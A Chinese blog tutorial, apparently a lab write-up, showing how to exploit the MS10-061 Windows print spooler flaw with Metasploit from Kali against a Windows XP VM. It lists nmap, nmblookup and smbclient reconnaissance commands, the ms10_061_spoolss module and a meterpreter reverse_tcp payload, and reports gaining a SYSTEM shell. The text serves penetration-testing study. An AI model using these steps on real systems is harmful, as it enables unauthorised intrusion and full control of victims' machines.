Kali利用msf对MS10_061漏洞进行渗透测试
注意事项:
- kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待!
- 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!!
1. Metasploit简介
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。详细介绍可以参考百度百科对 Mettasploit 的介绍。
2.打印后台程序服务模拟漏洞(CVE-2010-2729/MS10-061)
利用MSF中的攻击模块:ms10_061_spoolss,Windows打印后台程序没有充分的限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在Windows系统目录(%SystemRoot%\system32
)中创建文件。攻击者可以指定任何文件名,包括目录遍历,通过WritePrinter
请求,攻击者可以完全控制创建文件的内容。将文件写入到Windows系统目录(%SystemRoot%\system32
)后,通过WMI来部署恶意程序,因为系统会自动运行%SystemRoot%\System32\Wbem\MOF
文件夹的mof文件、执行命令。
该漏洞首次被发现并被利用于著名的Stuxnet蠕虫
(俗称“震网”)
3.实验环境
VMware虚拟环境
攻击机:Kali Linux;目标机:Windows xp sp2
4.实验步骤
4.1 使用Nmap扫描目标机器是否存在
NetBios
和RPC
服务
4.2 NetBios共享检测
4.3 使用MSF的ms10_061_spoolss模块攻击目标机
5.设置目标机环境
- 获取目标机IP
- 创建打印共享(默认是没有打印共享)
1)代开控制面板,选择打印机和其他硬件2)选择打印机和传真
3)添加打印机4)本地打印机,不勾选“自动检测并安装即插即用打印机”
5)选择使用LPT1端口
随便选一个打印机厂商和型号取个名字选择共享打印机
6.在Kali上检测打印机
1)nmap扫描
nmap -sS -sU -O -p127-139,445 192.168.230.137
- 1
2)查找NetBIOS
nmblookup -A 192.168.230.137
- 1
NetBIOS工作站名字:123-13DFCFEDD88
NetBIOS组名:WORKGROUP
7.访问SMB资源
smbclient -L \\123-13DFCFEDD88 -I 192.168.230.137 -N
- 1
看到了打印共享
8.使用MSF模块攻击
1)载入模块,搜索一下ms10_061
2)利用漏洞,并查看需要配置的参数
3)配置参数4)设置Payload
set payload windows/meterpreter/reverse_tcp
- 1
5)设置Payload参数6)攻击攻击完成后,建立了远程会话,恶意程序写入到目标机的%SystemRoot%\system32\2Uy3ygTXtpVrWD.exe
,恶意程序是通过%SystemRoot%\system32\wbem\mof\5V4jdMrNNFWWSH.mof
控制运行的。
7)接下来可以执行一系列操作
getuid
,getpid
可以看到我们获取了系统的system权限
此时执行shell
可以进入目标机的命令行界面
至此,整个攻击过程已经大体结束,之后可以进行取证等一系列工作。最后感谢各位的阅读,由于本人水平有限,如有不足,敬请谅解。
Kali利用msf对MS10_061漏洞进行渗透测试相关推荐
- kali利用MSF对ms17_010漏洞入侵win7
步骤一:实验环境的搭建 攻击机:kali(2021.1版本) 靶机:win7 旗舰版 sp1 在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它) 打开安 ...
- kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008 ...
- kail利用msf工具对MS12-020漏洞进行渗透测试
kail利用msf工具对MS12-020漏洞进行渗透测试 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞 kail利用msf工具对MS12-020漏洞进行渗透 ...
- kali 利用msf通过win7永恒之蓝漏洞获取权限
kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...
- Kali利用MSF入侵安卓手机
kali利用MSF入侵安卓手机 一.什么是MSF 二.演示环境 三.渗透过程 1.使用root权限 2.生成可执行木马文件 3.将生成的后门文件,放入靶机 4. 运行msfconsole命令 5.参数 ...
- 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)
利用Metasploit对HFS 2.3渗透攻击提权 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) msf6 > search hfs Matching Mod ...
- Kali利用msf渗透Windows电脑(超详细)
Kali利用msfvenom渗透Windows电脑 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行文件 3.运行msfconsole命令 4.配置参数 5.在靶机打开可执 ...
- Kali之MSF的MS08-067漏洞复现详解
1.MSF初识: MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集.漏洞扫描.漏洞利用以及提权等功能的工具. 目前安装的kali都自带MSF,可以直接在图形界 ...
- 基于msf与badusb的笔记本电脑渗透测试(详解)
文章目录 1. msf部分 1.1 生成木马文件 1.2 配置监听环境 2. Badusb部分 2.1 收集数据 2.2 编写脚本并上传 3. 配置局域网环境 3.1 创建局域网环境 3.2 设置共享 ...
最新文章
- Java编程中,有哪些好的习惯从一开始就值得坚持?
- 网易云课堂 学习教程
- 每天一个设计模式,工厂方法模式(Factory Method)
- 启动定时器t0的工作指令是_看门狗的工作原理、应用和设计思路
- 材料科学中的数据挖掘:晶体图神经网络解读与代码解析
- 用Eclipse进行C/C++开发
- 2021下午茶数字经济蓝皮书
- 别再用if-else了,用注解去代替他吧
- 惠州交警携手高德地图 引导市民智慧出行
- maven java 结构_Maven标准目录结构介绍
- angular语言前端开发_2020年前端Angular招聘-前端Angular招聘求职信息-拉勾招聘
- 报错:TargetException, 非静态方法需要一个目标
- 中无法打开源文件_Safari浏览器无法打开,如何解决Safari在Big Sur中崩溃的情况...
- 【毕设】ASP.net校友录毕业设计(源代码+论文+开题报告+答辩PPT)
- 【软件开发规范七】《Android UI设计规范》
- VMware Workstation 虚拟机下载及安装的详细步骤
- erwfgergve
- qcom vfe笔记(msm8996平台)
- 史诗级梦境之二:沙漠大逃亡
- 【String类和标准模板库】
热门文章
- Nordic nRF52832程序下载问题分析
- 计算机房英语单词,主机房是什么意思
- 盲僧一键r闪用什么设置_美加狮R.A.T. PRO X3至尊版带你畅玩模拟飞行
- mysql 大于号 优化_SQL优化 MySQL版 - 避免索引失效原则(二)
- PHP ERROR_PHP 处理错误函数
- lisp将图元追加选择_汕尾幸运儿喜爱大乐透 两次买彩票就擒获8注追加二等奖254万元...
- MongoDB系列之——安装和启动
- python函数的 全局变量与局部变量
- oracle安装及卸载总结
- 51nod1244 欧拉函数之和 杜教筛